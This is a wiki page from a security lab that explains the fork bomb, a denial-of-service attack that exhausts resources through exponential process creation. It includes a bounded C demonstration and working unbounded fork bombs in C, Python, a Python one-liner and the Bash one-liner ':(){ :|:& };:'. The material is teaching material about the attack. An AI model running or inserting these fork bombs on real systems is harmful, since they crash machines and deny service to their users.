Difference between revisions of "Fork bomb"

From Embedded Lab Vienna for IoT & Security

Revision as of 08:19, 21 May 2020

Summary

The fork bomb (also called rabbit virus or wabbit) is a memory-exhausting denial-of-service (DoS) attack. It depletes the memory of a machine by replicating itself exponentially until all memory is used up.

Implementation

The fork bomb uses the fork system call, which is implemented in every programming language. A call to fork creates a child process that executes the next line of code simultaneously with its parent. The parent process patiently awaits the completion of its child processes, but the child processes never reach completion because they are also waiting for their own child processes.

1| fork()                  L1
                          /  \
2| fork()               L2    L2
                       / \    / \
3| fork()             L3  L3 L3  L3

As the code shows, the processes double with every line, so the number of running processes increases in proportion to <math>2^{n}</math>.
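The doubling shown in the diagram can be measured safely with a bounded number of fork() calls. The following is an added example, not code from the original page; the function name `count_after_forks` and the cap `MAX_FORKS` are assumptions made for this illustration.

```c
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#define MAX_FORKS 6 /* hypothetical safety cap: at most 2^6 = 64 processes */

/* Executes n sequential fork() calls (always bounded by MAX_FORKS) inside a
 * helper process and returns how many processes existed afterwards.
 * Expected result: 2^n. Returns -1 on bad input or setup failure. */
long count_after_forks(int n)
{
    int fds[2];
    if (n < 0 || n > MAX_FORKS || pipe(fds) != 0)
        return -1;

    fflush(NULL);                 /* avoid duplicated stdio buffers */
    pid_t root = fork();          /* helper: the single process at L1 */
    if (root < 0) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }
    if (root == 0) {
        close(fds[0]);
        for (int i = 0; i < n; i++)   /* line i+1 of the diagram */
            if (fork() < 0)
                break;                /* limit hit: count stays below 2^n */
        /* Parent and child both continue here, so each reports once. */
        int ok = write(fds[1], "x", 1) == 1;
        close(fds[1]);
        while (wait(NULL) > 0) { }    /* reap this process's own children */
        _exit(ok ? 0 : 1);
    }

    close(fds[1]);                /* EOF arrives once every process reported */
    long count = 0;
    char c;
    while (read(fds[0], &c, 1) == 1)
        count++;
    close(fds[0]);
    waitpid(root, NULL, 0);
    return count;
}

int main(void)
{
    for (int n = 0; n <= 3; n++)
        printf("%d fork() calls -> %ld processes\n", n, count_after_forks(n));
    return 0;
}
```

If a per-user process limit stops one of the fork() calls, the returned count is lower than <math>2^{n}</math>, which makes the effect of such a limit directly visible.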

The following section shows some fork bomb examples written in different languages.

C

#include <unistd.h> 
int main(void) 
{  
  for(;;)  
     fork(); 
  return 0; 
}

Python

import os
   
while True:  
   os.fork() 

Command line variant:

python -c 'while 1: __import__("os").fork()'

Unix Bash

:(){ :|:& };: 

This command can be deciphered like this:

:()       # Defines the following function ":"
{
   :       # Calls a copy of the function ":"
   |       # Pipes the output into the second copy, so that it is not seen in the shell
   :       # Calls another copy of the function ":"
   &       # Runs the pipeline as a background process
}
:         # Runs the previously defined function ":"

This command is really dangerous because any user can run it without any permissions.

References

[1] https://de.wikipedia.org/wiki/Forkbomb (German version, source of the code examples)

[2] https://en.wikipedia.org/wiki/Forkbomb

[3] https://www.geeksforgeeks.org/fork-system-call/

[4] IEEE: Exploring the Possibility of USB based Fork Bomb Attack on Windows Environment